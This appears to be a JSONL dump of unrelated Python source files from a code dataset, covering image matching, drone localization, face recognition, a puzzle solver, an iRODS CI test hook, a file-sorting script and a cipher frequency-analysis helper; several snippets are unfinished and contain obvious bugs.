+{"seq_id":"378516803","text":"#!/usr/bin/python3\n#date: 08/10/2020\nddd = [61, 71, 11, 21, 32, 19, 27, 31]\ndestination = [\"Brasilia\", \"Salvador\", \"Sao Paulo\", \"Rio de Janeiro\", \"Juiz de Fora\", \"Campinas\", \"Vitoria\", \"Belo Horizonte\"]\n\ncode_number = int(input())\nsomatorio = 0\n\n# count the registered DDD codes\nfor item in ddd:\n\tsomatorio += 1\n\nif code_number in ddd:\n\t# check every registered code, including the last one\n\tfor item in range(somatorio):\n\t\tif code_number == ddd[item]:\n\t\t\tprint(destination[item])\nelse:\n\tprint(\"DDD nao cadastrado\")","sub_path":"P1/1050.py","file_name":"1050.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"496252403","text":"####################### EXTERNAL IMPORTS ###################################\nfrom keras.layers import Conv2D, MaxPool2D, Dense, Dropout, Flatten\nfrom keras.models import Sequential, load_model\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\n############################################################################\n\n####################### INTERNAL IMPORTS ###################################\nfrom Utility import rotate_image, pair_pixels, brief_encode\nfrom Utility import calc_weight_brief, calc_weight_sse, calc_weight_cossim\nfrom DataProcessor import *\nfrom VisualOdometry import *\nfrom ParticleFilter import *\n############################################################################\n\n\nclass Localizer:\n\t'''Full localization solution, with various performance assessment functions.\n\t   Mostly centered around terrain classification. 
Does not work properly yet.'''\n\n\tdef __init__(self, map_file, camera_path, weights_file, frames, num_particles=1000):\n\t\t'''\n\t\tInitialize Localizer object.\n\t\tArgs:\n\t\t\t map_file: path to file of the global map to use\n\t\t\t camera_path: path to camera images taken during the flight\n\t\t weights_file: path to weights file to use learning model with\n\t\t\t\t frames: total count of images taken during the flight\n\t\t'''\n\t\tself._set_processor(map_file=map_file,\n\t\t\t\t\t\t\tcamera_path=camera_path,\n\t\t\t\t\t\t\tweights_file=weights_file)\n\n\t\tself._set_filter(x_range=(600, 4200), y_range=(600, 4200), z_range=(30,150), N=num_particles)\n\n\t\tself._set_odometry(camera_path=camera_path, last_frame=frames)\n\n\n\t# ------------------------ OBJECT SETTERS/GETTERS ------------------------#\n\tdef _set_processor(self, map_file, camera_path, weights_file):\n\t\tself.processor = DataProcessor(map_file, camera_path, weights_file)\n\n\tdef get_processor(self):\n\t\treturn self.processor\n\n\tdef _set_filter(self, x_range, y_range, z_range, N):\n\t\tself.filter = ParticleFilter(x_range, y_range, z_range, N)\n\n\tdef get_filter(self):\n\t\treturn self.filter\n\n\tdef _set_odometry(self, camera_path, last_frame):\n\t\tself.odometry = VisualOdometry(camera_path, last_frame)\n\n\tdef get_odometry(self):\n\t\treturn self.odometry\n\t# ------------------------------------------------------------------------#\n\n\n\t# -------------- PERFORMANCE ASSESSMENT AND RESULT PLOTTING --------------#\n\t\n\tdef plot_trajectory(self, estimated_traj, true_traj, plot_title=\"Flight Trajectory\"):\n\t\t'''\n\t\tPlot estimated and true trajectories (only considers x and y values).\n\t\tArgs:\n\t\t\testimated_traj: x,y-value pairs of trajectory estimated with particle filter\n\t\t\t\t true_traj: x,y-value pairs of trajectory declared in ground truth\n\t\t\t\tplot_title: title for the plot\n\t\t'''\n\n\t\t# initialize plot\n\t\tfig, ax = plt.subplots()\n\t\tax.title.set_text(plot_title)\n\n\t\t# show map\n\t\timg = plt.imread(self.processor.map_file)\n\t\tax.imshow(img)\n\n\t\t# plot trajectories\n\t\tax.plot(estimated_traj[:,0], estimated_traj[:,1], 'r', label=\"Estimated Trajectory\")\n\t\tax.plot(true_traj[:,0], true_traj[:,1], label=\"True Trajectory\")\n\t\tax.legend()\n\t\tax.set_xlabel(\"X-values (pixels)\")\n\t\tax.set_ylabel(\"Y-values (pixels)\")\n\t\tplt.show()\n\n\n\tdef collect_mean_data(self, true_traj, runs=5, measurement=\"sse\"):\n\t\t'''\n\t\tCalculate mean errors and variances in trajectory between the runs.\n\t\tArgs:\n\t\t\ttrue_traj: array with x,y-value pairs of true trajectory\n\t\t\t\t runs: number of times to run the particle filter\n\t\tReturns mean errors and variances.\n\t\t'''\n\t\terrors = []\n\t\tvariances = []\n\t\tfor i in range(runs):\n\t\t\tprint(\"ITERATION:\", i+1)\n\t\t\testimated_traj, variance_traj = self.process_flight(measurement=measurement)\n\t\t\tself.odometry.reset_frames()\n\t\t\tself.filter.reset_particles()\n\n\t\t\terror_xy = np.abs(estimated_traj - true_traj)\n\t\t\terror_traj = np.hypot(error_xy[:,0], error_xy[:,1])\n\n\t\t\terrors.append(error_traj)\n\t\t\tvariances.append(variance_traj)\n\n\t\tmean_err = np.mean(np.array(errors), axis=0)\n\t\tmean_var = np.mean(np.array(variances), axis=0)\n\t\treturn mean_err, mean_var\n\n\n\tdef plot_errors(self, mean_err, plot_title=\"Mean Trajectory Errors\"):\n\t\t'''\n\t\tPlot mean errors in trajectory.\n\t\tArgs:\n\t\t\t mean_err: mean errors on each camera frame\n\t\t\tplot_title: title of the 
plot\n\t\t'''\n\t\tplt.title(plot_title)\n\t\tplt.plot(np.arange(1, mean_err.shape[0]+1), mean_err)\n\t\tplt.xlabel(\"Iteration (Camera Frame Number)\")\n\t\tplt.ylabel(\"Mean Trajectory Error (pixels, 1px ~ 0.25m)\")\n\t\tplt.show()\n\n\n\tdef plot_variances(self, mean_var, plot_title=\"Mean Position Variances\"):\n\t\t'''\n\t\tPlot mean variances of position.\n\t\tArgs:\n\t\t\tmean_var: mean variances in x and y coordinates on each camera frame\n\t\t plot_title: title of the plot\n\t\t'''\n\t\tplt.title(plot_title)\n\t\tplt.plot(np.arange(1, mean_var.shape[0]+1), mean_var[:,0], label=\"along x-axis\")\n\t\tplt.plot(np.arange(1, mean_var.shape[0]+1), mean_var[:,1], label=\"along y-axis\")\n\t\tplt.xlabel(\"Iteration (Camera Frame Number)\")\n\t\tplt.ylabel(\"Mean Variance (pixels, 1px ~ 0.25m)\")\n\t\tplt.legend()\n\t\tplt.show()\n\t# ------------------------------------------------------------------------#\n\n\n\t# ----------------------------- LOCALIZATION -----------------------------#\n\tdef process_flight(self, measurement=\"brief\"):\n\t\tprint(\"Begin processing flight.\")\n\n\t\t# initialize objects\n\t\tprocessor = self.get_processor()\n\t\tp_filter = self.get_filter()\n\t\todometry = self.get_odometry()\n\t\tprint(\"All objects initialized.\")\n\n\t\t# initialize MCL particles\n\t\tp_filter.initialize_particles()\n\t\tparticles = p_filter.particles\n\t\tprint(\"MCL particles initialized.\")\n\n\t\tmean_positions = []\n\t\tvar_positions = []\n\t\ttimer_start = time.time()\n\t\t# process all flight images\n\t\tfor i in range(2, odometry.last_frame+1):\n\t\t\t# get camera image\n\t\t\tframe = processor.get_camera_image(i)\n\t\t\tprint(\"Frame {}:\".format(i))\n\n\t\t\t# extract mean optical flow, update particle positions\n\t\t\tdx, dy = odometry.process_next_frame()\n\t\t\tp_filter.motion_update(dx, dy)\n\n\t\t\tprint(\"Received motion update from odometry: {:.3f}, {:.3f}\".format(dx, dy))\n\t\t\tprint(\"Begin measuring particles.\")\n\n\t\t\t# keep frame resize constant to conserve resources (downscale by ~half on each side)\n\t\t\tframe = processor.adjust_for_height(frame, drone_height=90)\n\t\t\tframe_prediction = processor.construct_prediction(frame)\n\t\t\tpred_shape = [frame_prediction.shape[0], frame_prediction.shape[1]]\n\n\t\t\t# weigh particles\n\t\t\tweights = []\n\t\t\tfor particle in particles:\n\t\t\t\tx, y, z, angle = particle[0], particle[1], particle[2], particle[3]\n\t\t\t\tparticle_prediction = processor.get_particle_area(pX=x, pY=y, angle=angle,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tw=pred_shape[1], h=pred_shape[0])\n\t\t\t\tif measurement == \"sse\":\n\t\t\t\t\tweight = calc_weight_sse(frame_prediction, particle_prediction)\n\t\t\t\telse:\n\t\t\t\t\tweight = calc_weight_brief(frame_prediction, particle_prediction)\n\t\t\t\tweights.append(weight)\n\n\t\t\t# update particle weights, resample\n\t\t\tp_filter.sensor_update(np.array(weights))\n\t\t\tp_filter.resample()\n\n\t\t\tpos_mean, pos_var = p_filter.estimate()\n\t\t\tmean_positions.append(pos_mean)\n\t\t\tvar_positions.append(pos_var)\n\t\t\tprint(\"Mean:\", np.round(pos_mean,3))\n\t\t\tprint(\"Variance: {}\\n\".format(np.round(pos_var,3)))\n\n\t\tprint(\"\\nTotal time: {:.3f} seconds.\".format(time.time()-timer_start))\n\t\ttrajectory = np.array(mean_positions)[:, :2]\n\t\tvar_positions = np.array(var_positions)[:, :2]\n\t\treturn trajectory, var_positions\n\n\nif __name__ == \"__main__\":\n\n\t# declare paths to camera images for each flight\n\tcamera_flight1 = \"../data/camera_feed/Flight1/\"\n\tcamera_flight2 
= \"../data/camera_feed/Flight2/\"\n\n\t# global maps files\n\tmap1_file = \"../data/maps/AdM-01-2014.jpg\"\n\tmap2_file = \"../data/maps/AdM-03-2014.jpg\"\n\n\t# ground truth files\n\ttruth_flight1 = \"../data/ground_truth/Flight1/traj_truth.txt\"\n\ttruth_flight2 = \"../data/ground_truth/Flight2/traj_truth.txt\"\n\n\t# learning model weights\n\tweights_file = \"../data/learning_model/sat6_weights.hdf5\"\n\n\n\t# simulate flight 1 on map 1 and plot results\n\tlocalizer_fl1_map1 = Localizer(map1_file, camera_flight1, weights_file, frames=358, num_particles=1000)\n\testimated_traj = localizer_fl1_map1.process_flight()[0]\n\ttrue_traj = localizer_fl1_map1.get_processor().read_truth(truth_flight1)\n\tlocalizer_fl1_map1 = plot_trajectory(estimated_traj, true_traj, plot_title=\"Flight Trajectory\")\n\n\t\n\n\n\n\n\n","sub_path":"source/Localizer.py","file_name":"Localizer.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"11034850","text":"import unittest\nimport os\nos.chdir(r'../')\n\nimport Utils\nfrom SPARQLGenerator import SPARQLGeneratorClass\n\n\n\n\nclass BaseTestClass(unittest.TestCase):\n def test_dynamic_average_question_type_one(self):\n statement = \"Could you tell me what is average for sensor3 in machine3?\"\n queryLinkedFactory = Utils.questionMarkProcess(statement)\n result_selenium = SPARQLGeneratorClass.queryTestingSelenium(queryLinkedFactory)\n self.assertEqual(result_selenium.get('avg'), '6.33333')\n\n def test_dynamic_average_indicative_question(self):\n statement = \"I need to learn an average for sensor1 in machine1?\"\n queryLinkedFactory = Utils.questionMarkProcess(statement)\n result_selenium = SPARQLGeneratorClass.queryTestingSelenium(queryLinkedFactory)\n self.assertEqual(result_selenium.get('avg'), '6.33333')\n\n\n #@unittest.skip(\"Last query will be tested\")\n def test_dynamic_average_question_type_two(self):\n statement = \"What is the average of sensor3 in machine3?\"\n queryLinkedFactory = Utils.questionMarkProcess(statement)\n result_selenium = SPARQLGeneratorClass.queryTestingSelenium(queryLinkedFactory)\n self.assertNotEqual(result_selenium.get('avg'), '6.33333')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"AlgorithmQuestionAnswering/Tests/TestDynamicTriples.py","file_name":"TestDynamicTriples.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"180336680","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 20 14:50:10 2017\n\n@author: gramirez\n\"\"\"\n#We load the actual libraries and prepare de data//Cargamos todo las librerias y preparamos los datos\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport random as rd\n\n\n#Loading the direction.txt that let us have all the loaded directory//Carga todas las direcciones de la lista en base a un txt\ndef reading(archivo):\n \n with open(archivo, 'r') as f:\n direccion = [line.strip() for line in f]\n \n return direccion\n \ndes = []\ndeter = []\nimagenes = []\nkp = []\n\nbf = cv2.BFMatcher()\n\n\n#just for the project\ndireccion = reading(\"defensa.txt\")\nif(False):\n \n direccion2= reading(\"eiffel.txt\")\n direccion3= reading(\"general.txt\")\n direccion4= reading(\"invalides\")\n direccion5= reading(\"louvre\")\n direccion6= reading(\"moulinrouge\")\n direccion7= reading(\"museedorsay\")\n direccion8= reading(\"notredame\")\n direccion9= 
reading(\"pompidou\")\n direccion10= reading(\"sacrecoeur\")\n direccion10= reading(\"triomphe\")\n \n \n\n#DATASET\n\ndefense = load(direccion)\n\n\n\n\n#we get kp,ds\n\ndefense_kp,defense_des = get_det(defense)\n\n\n\n\n\n#Temporal trying\nFLANN_INDEX_KDTREE = 0\n\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n\nsearch_params = dict(checks=50) # or pass empty dictionary\n\n\nflann = cv2.FlannBasedMatcher(index_params,search_params)\n\n\n#Temporal array with list of images// Lista temporal con datos del arreglo\n#direcciones = [\"graffiti/graff/img1.png\",\"graffiti/graff/img2.png\",\"graffiti/graff/img3.png\",\"graffiti/graff/img4.png\",\"graffiti/boat/img4.png\",\"graffiti/boat/img5.png\",\"graffiti/boat/img6.png\"]\n\nsift = cv2.xfeatures2d.SIFT_create()\n\ndef create_imgdata(image):\n data = []\n kp_t,des_t = sift.detectAndCompute(image,None)\n temp = (image, kp_t, des_t)\n data.append(temp)\n return data\n\ndef cargar(link): #Load each file//Carga cada archivo\n img = cv2.imread(link)\n return img\n\ndef get_data(img): #Get the datato copile, just for Test//Coge los datos, solo para pruebas\n kp1, des1 = sift.detectAndCompute(img,None)\n print(bf) \n print(\"Done\") \n return des1\n\n\n\ndef get_deter(arreglo): #Give the KP and DES from the array//Coje los datos de discrimiante del arreglo\n respuesta = []\n respuesta2 = []\n for imagen in arreglo:\n kp, des = sift.detectAndCompute(imagen,None)\n respuesta.append(kp)\n respuesta2.append(des)\n return respuesta, respuesta2\n\n#def match(kp1,kp2,des1,des2): #For test uses//Para pruebas\ndef match(des1,des2): #For test uses//Para pruebas\n \n #bf = cv2.BFMatcher()\n #matches = bf.knnMatch(des1,des2, k=2)\n matches = flann.knnMatch(des1,des2,k=2)\n good = 0\n #for m,n in matches:\n # if m.distance < 0.75*n.distance:\n # #good.append([m]) \n # good = good + 1\n return good \n\n\ndef running(img_data,arregloi,arreglok,arreglod): #Calculate the list of most similar images// Calcula una lista con las imagenes mas similares\n top = 0\n for i in range(0,len(arregloi)-1):\n #temp = match(img_data[0][1],arreglok[i],img_data[0][2],arreglod[i])\n temp = match(img_data[0][2],arreglod[i])\n data = (temp,i)\n #temp = flann.knnMatch(,des2,k=2)\n top.append(data)\n top = top+1\n #return sorted(top,key=lambda order:order[0],reverse = True)\n return top\n\ndef matching(img,img2): #codigo de referencia // reference code\n sift = cv2.xfeatures2d.SIFT_create()\n kp1, des1 = sift.detectAndCompute(img,None)\n kp2, des2 = sift.detectAndCompute(img2,None)\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(des1,des2, k=2)\n good = []\n for m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m]) \n img3 = cv2.drawMatchesKnn(img,kp1,img2,kp2,good,None,flags=2)\n show_inside(img3)\n return len(good) \n\ndef load(arreglo): #Carga de imagenes\n respuesta = []\n for direccion in arreglo:\n temp = cargar(direccion)\n if temp != None : \n respuesta.append(cargar(direccion))\n if temp == None:\n print(direccion)\n return respuesta\n\n\ndef result(respuesta,tope): #Resultado\n for i in range(0,tope):\n picture1 = imagenes[respuesta[i][1]]\n show(picture1)\n return\n\ndef show(temp):\n plt.imshow(temp)\n plt.show()\n return\n\n#We start the parameters for a quick use////Iniciamos los parametros para cargar imagenes y datos\n#imagenes = load(direcciones)\n#kp,des = get_deter(imagenes)\n \n 
","sub_path":"winter_final.py","file_name":"winter_final.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"485908155","text":"import cv2\nimport numpy as np\nimport os\nsize=4\nhaar_file = 'haarcascade_frontalface_default.xml'\ndataset='dataset'\n\nprint('Recognizing Face Please Be in sufficient light')\n\n(images,lables,names,id)=([],[],{},0)\nfor (subdirs,dirs,files) in os.walk(dataset):\n for subdir in dirs:\n names[id]=subdir\n subjectpath=os.path.join(dataset,subdir)\n for filename in os.listdir(subjectpath):\n path=subjectpath + '/' + filename\n lable=id\n images.append(cv2.imread(path,0))\n lables.append(int(lable))\n id=id+1\n\n(width,height)=(130,100)\n\n(images,lables)=[np.array(lis) for lis in [images,lables]]\n\n\nmodel=cv2.face.LBPHFaceRecognizer_create()\nmodel.train(images,lables)\n\n\nface_cascade=cv2.CascadeClassifier(haar_file)\nwebcam=cv2.VideoCapture(0)\nwhile True:\n (_,im)=webcam.read()\n gray=cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\n faces=face_cascade.detectMultiScale(gray,1.3,5)\n for (x,y,w,h) in faces:\n cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n face=gray[y:y+h,x:x+w]\n face_resize=cv2.resize(face,(width,height))\n prediction=model.predict(face_resize)\n cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),3)\n \n if prediction[1]<99:\n \n cv2.putText(im, '% s - %.0f' % (names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0)) \n else:\n cv2.putText(im,'not recognized',(x-10,y-10),cv2.FONT_HERSHEY_PLAIN,1,(0,255,0))\n \n cv2.imshow('OpenCV',im)\n \n \n if cv2.waitKey(1) & 0xFF==ord('q') :\n break\n \n ","sub_path":"face_recognizer.py","file_name":"face_recognizer.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"359128037","text":"import utils\nfrom day_03_inputs import wires, traverse_tests, traverse_tests_2\n\n\n@utils.timer\ndef traverse_wires(wire_a, wire_b, return_manhattan=True):\n # extract path (in x, y coordinates) from wires\n path_a = extract_path_from_wire(wire_a)\n path_b = extract_path_from_wire(wire_b)\n\n intersections = [] # for manhattan distance]\n detailed_intersections = [] # for steps total\n\n # check each line segment from wire_a with all segments from wire_b\n for idx_a in range(0, len(path_a) - 1):\n line_a = [path_a[idx_a], path_a[idx_a + 1]]\n\n for idx_b in range(0, len(path_b) - 1):\n line_b = [path_b[idx_b], path_b[idx_b + 1]]\n\n exists, coords = check_for_intersection(line_a, line_b)\n\n if exists:\n if return_manhattan:\n intersections.append(tuple(coords))\n else:\n path_steps = (idx_a, idx_b)\n pre_intersection_coords = (path_a[idx_a], path_b[idx_b])\n detailed_intersections.append(\n (path_steps, pre_intersection_coords, coords))\n\n if return_manhattan:\n return min([sum([abs(x), abs(y)]) for x, y in intersections])\n else:\n least_steps = None\n\n # int_coords, int as in abbr for intersection\n for steps, pres, int_coords in detailed_intersections:\n step_a, step_b = steps # direction-steps up to intersection\n pre_a, pre_b = pres # coordinates before intersection\n\n wire_a_steps = count_steps(wire_a, step_a, pre_a, int_coords)\n wire_b_steps = count_steps(wire_b, step_b, pre_b, int_coords)\n\n total_steps = wire_a_steps + wire_b_steps\n\n if least_steps is None:\n least_steps = total_steps\n else:\n least_steps = min(least_steps, total_steps)\n\n return least_steps\n\n\ndef count_steps(wire, steps, 
pre_coords, int_coords):\n total = 0\n\n # add the integer values from the wire-directions\n for idx in range(0, steps):\n direction = wire[idx]\n total += int(direction[1:])\n\n x1 = pre_coords[0]\n y1 = pre_coords[1]\n x2 = int_coords[0]\n y2 = int_coords[1]\n\n # add the difference between the pre-intersection coords and\n # intersection coords\n total += (max(x1, x2) - min(x1, x2)) + (max(y1, y2) - min(y1, y2))\n return total\n\n\ndef extract_path_from_wire(wire, origin=[0, 0]):\n path = [origin]\n\n # append coordinates for each direction in inputs\n for direction in wire:\n next_coords = get_next_coords(path[-1], direction)\n path.append(next_coords)\n\n return path\n\n\ndef get_next_coords(coords, direction):\n next_coords = coords.copy()\n direction, distance = direction[0], int(direction[1:])\n\n # x-axis [0] / y-axis [1]\n change_pos = 0 if direction in {\"R\", \"L\"} else 1\n # positive / negative axis movement\n multiplier = 1 if direction in {\"U\", \"R\"} else -1\n\n next_coords[change_pos] = next_coords[change_pos] + (distance * multiplier)\n return next_coords\n\n\ndef check_for_intersection(line_a, line_b):\n exists = False\n coords = [None, None]\n\n # sp = static position, r = range\n sp_a, ra_start, ra_end = static_pos_and_range(*line_a)\n sp_b, rb_start, rb_end = static_pos_and_range(*line_b)\n\n # if both static positions are equal, they are parallel / no intersection\n if sp_a == sp_b:\n return exists, coords\n\n static_val_a = line_a[0][sp_a]\n static_val_b = line_b[0][sp_b]\n\n # check if static value of line is within the other line's range\n a_in_b_range = rb_start <= static_val_a <= rb_end\n b_in_a_range = ra_start <= static_val_b <= ra_end\n\n # if both are true, the line intersects at the two static values\n exists = a_in_b_range and b_in_a_range\n # place the values with the relative static position\n coords[sp_a] = static_val_a\n coords[sp_b] = static_val_b\n\n # the origin does not count as an intersection\n if coords == [0, 0]:\n exists = False\n\n return exists, coords\n\n\ndef static_pos_and_range(coord_a, coord_b):\n # set static and range list positions\n if coord_a[0] == coord_b[0]:\n static_pos, r_pos = 0, 1\n elif coord_a[1] == coord_b[1]: # this could probably be 'else'\n static_pos, r_pos = 1, 0\n\n # set range start and end values\n r = [coord_a[r_pos], coord_b[r_pos]]\n r_start = min(r)\n r_end = max(r)\n\n return static_pos, r_start, r_end\n\n\ndef test_traverse_wires():\n print(\"---Testing manhattan distance...---\")\n for test, answer in traverse_tests:\n wire_a, wire_b = test\n assert traverse_wires(wire_a, wire_b) == answer\n print(\"---Test over---\\n\")\n\n\ndef test_traverse_wires_2():\n print(\"---Testing steps distance...---\")\n for test, answer in traverse_tests_2:\n wire_a, wire_b = test\n assert traverse_wires(wire_a, wire_b, return_manhattan=False) == answer\n print(\"---Test over---\\n\")\n\n\ntest_traverse_wires()\ntest_traverse_wires_2()\n\nwire_a, wire_b = wires\n# Part 1 Time: ~0.17 seconds\nprint(traverse_wires(wire_a, wire_b)) # 2180\n# Part 2 Time: ~0.14 seconds\nprint(traverse_wires(wire_a, wire_b, return_manhattan=False)) # 112316\n","sub_path":"day_03_answers_save.py","file_name":"day_03_answers_save.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"430186980","text":"from __future__ import print_function\n\nimport optparse\nimport os\nimport shutil\nimport glob\nimport time\nimport irods_python_ci_utilities\n\ndef 
install_cmake_and_add_to_front_of_path():\n irods_python_ci_utilities.install_os_packages(['irods-externals-cmake3.5.2-0'])\n os.environ['PATH'] = '/opt/irods-externals/cmake3.5.2-0/bin' + os.pathsep + os.environ['PATH']\n\ndef get_build_prerequisites_all():\n return ['irods-externals-clang3.8-0',\n 'irods-externals-cppzmq4.1-0',\n 'irods-externals-libarchive3.1.2-0',\n 'irods-externals-avro1.7.7-0',\n 'irods-externals-clang-runtime3.8-0',\n 'irods-externals-boost1.60.0-0',\n 'irods-externals-jansson2.7-0',\n 'irods-externals-zeromq4-14.1.3-0']\n\ndef get_build_prerequisites_apt():\n return ['libstdc++6', 'libcurl4-gnutls-dev', 'make', 'libssl-dev', 'gcc', 'g++', 'libfuse-dev'] + get_build_prerequisites_all()\n\ndef get_build_prerequisites_yum():\n return ['curl-devel', 'openssl-devel', 'gcc-g++', 'fuse', 'fuse-devel'] + get_build_prerequisites_all()\n\ndef get_build_prerequisites():\n dispatch_map = {\n 'Ubuntu': get_build_prerequisites_apt,\n 'Centos': get_build_prerequisites_yum,\n 'Centos linux': get_build_prerequisites_yum,\n 'Opensuse ': get_build_prerequisites_yum,\n }\n try:\n return dispatch_map[irods_python_ci_utilities.get_distribution()]()\n except KeyError:\n irods_python_ci_utilities.raise_not_implemented_for_distribution()\n\ndef install_build_prerequisites_apt():\n if irods_python_ci_utilities.get_distribution() == 'Ubuntu': # cmake from externals requires newer libstdc++ on ub12\n if irods_python_ci_utilities.get_distribution_version_major() == '12':\n irods_python_ci_utilities.install_os_packages(['python-software-properties'])\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'add-apt-repository', '-y', 'ppa:ubuntu-toolchain-r/test'], check_rc=True)\n irods_python_ci_utilities.install_os_packages(['libstdc++6'])\n irods_python_ci_utilities.install_os_packages(get_build_prerequisites())\n\ndef install_build_prerequisites_yum():\n irods_python_ci_utilities.install_os_packages(get_build_prerequisites())\n\ndef install_build_prerequisites():\n dispatch_map = {\n 'Ubuntu': install_build_prerequisites_apt,\n 'Centos': install_build_prerequisites_yum,\n 'Centos linux': install_build_prerequisites_yum,\n 'Opensuse ': install_build_prerequisites_yum,\n }\n try:\n return dispatch_map[irods_python_ci_utilities.get_distribution()]()\n except KeyError:\n irods_python_ci_utilities.raise_not_implemented_for_distribution()\n\ndef main():\n parser = optparse.OptionParser()\n parser.add_option('--output_root_directory')\n parser.add_option('--built_packages_root_directory')\n parser.add_option('--mungefs_packages_directory')\n\n options, _ = parser.parse_args()\n\n output_root_directory = options.output_root_directory\n built_packages_root_directory = options.built_packages_root_directory\n package_suffix = irods_python_ci_utilities.get_package_suffix()\n os_specific_directory = irods_python_ci_utilities.append_os_specific_directory(built_packages_root_directory)\n irods_python_ci_utilities.install_os_packages_from_files(glob.glob(os.path.join(os_specific_directory, 'irods-rule-engine-plugin-storage-tiering*.{0}'.format(package_suffix))))\n\n irods_python_ci_utilities.install_irods_core_dev_repository()\n install_cmake_and_add_to_front_of_path()\n install_build_prerequisites()\n\n time.sleep(10)\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'chmod', 'g+rwx', '/dev/fuse'], check_rc=True)\n\n time.sleep(10)\n\n try:\n test_output_file = 'log/test_output.log'\n irods_python_ci_utilities.subprocess_get_output(['sudo', 'su', '-', 'irods', '-c', 'python2 
scripts/run_tests.py --xml_output --run_s test_plugin_storage_tiering 2>&1 | tee {0}; exit $PIPESTATUS'.format(test_output_file)], check_rc=True)\n finally:\n if output_root_directory:\n irods_python_ci_utilities.gather_files_satisfying_predicate('/var/lib/irods/log', output_root_directory, lambda x: True)\n shutil.copy('/var/lib/irods/log/test_output.log', output_root_directory)\n #shutil.copytree('/var/lib/irods/test-reports', os.path.join(output_root_directory, 'test-reports'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"irods_consortium_continuous_integration_test_hook.py","file_name":"irods_consortium_continuous_integration_test_hook.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"288085222","text":"import os\r\n\r\n#If folder not exist then create folder\r\ndef createFolder(folder):\r\n if not os.path.exists(folder):\r\n os.makedirs(folder)\r\n\r\n# Move Files into Folder\r\ndef move(folderName,files):\r\n for file in files:\r\n os.replace(file, f\"{folderName}/{file}\") \r\n \r\n \r\n\r\nfiles = os.listdir()\r\nfiles.remove(\"autoFileCleaner.py\")\r\ncreateFolder('Images')\r\ncreateFolder('Docs')\r\ncreateFolder('Media')\r\ncreateFolder('Others')\r\n\r\nimgExts = [\".png\",\".jpg\",\".jpeg\"]\r\nimages = [file for file in files if os.path.splitext(file)[1].lower() in imgExts ]\r\n\r\ndocExts = [\".txt\",\".docx\",\".doc\",\".pdf\"]\r\ndocs = [file for file in files if os.path.splitext(file)[1].lower() in docExts] \r\n\r\nmediaExts = [\".mp4\",\".mp3\",\".flv\",\".mkv\",\".webm\"]\r\nmedias = [file for file in files if os.path.splitext(file)[1].lower() in mediaExts]\r\n\r\nothers = []\r\nfor file in files:\r\n ext = os.path.splitext(file)[1].lower()\r\n if (ext not in mediaExts) and (ext not in docExts) and (ext not in imgExts):\r\n others.append(file)\r\n\r\n#Move files into created folder\r\nmove(\"Images\",images)\r\nmove(\"Docs\",docs)\r\nmove(\"Media\",medias)\r\nmove(\"Others\",others)","sub_path":"autoFileCleaner.py","file_name":"autoFileCleaner.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"601910287","text":"def list_correlation(position, ciphered):\n d = text_pretreatment('./jane')\n r = list_treatment(lst)\n\ndef text_pretreatment(address):\n from collections import OrderedDict\n f = open(address,'r')\n c = f.read(1)\n dic = {}\n while c:\n if c >= 'a' and c<='z':\n if c in dic:\n dic[c]+=1\n else:\n dic[c]=1\n c = f.read(1) \n sum_ = float(sum(dic.values()))\n d = dict(zip(dic.keys(), map(lambda x : round(round(float(x) / sum_,4) *100,2) , dic.values()))) \n return OrderedDict(sorted(d.items(), key=lambda t: t[1]))\n\n\n\ndef list_treatment(lst):\n dic = {}\n for i in lst:\n if not (i in dic):\n dic[i]=1\n else:\n dic[i]+=1\n\n dict2 = {}\n sum_ = float(sum(dic.values()))\n d = dict(zip(dic.keys(), map(lambda x : round(float(x) / sum_,2) , dic.values())))\n return OrderedDict(sorted(d.items(), key=lambda t: t[1]))\n\ndef regenerate_text(message, key):\n lst = []\n for i in range(key):\n lst.append([])\n for i in range(len(message)):\n lst[i%key] = lst[i%key] + [message[i]]\n return lst \n\ndef main():\n print(text_pretreatment('./jane'))\n \"\"\"print(regenerate_text(\"mioutasasfasf\",9))\n print(list_treatment(['a', 'b', 'a']))\n\"\"\"\n\nif __name__ == '__main__':\n main() 
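\n\n# Illustration with hypothetical values: regenerate_text splits a ciphertext\n# into one stream per key position, e.g. regenerate_text('abcdefgh', 3)\n# returns [['a','d','g'], ['b','e','h'], ['c','f']]; each stream is what a\n# Vigenere frequency attack is meant to analyse against the reference\n# distribution computed by text_pretreatment().\n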
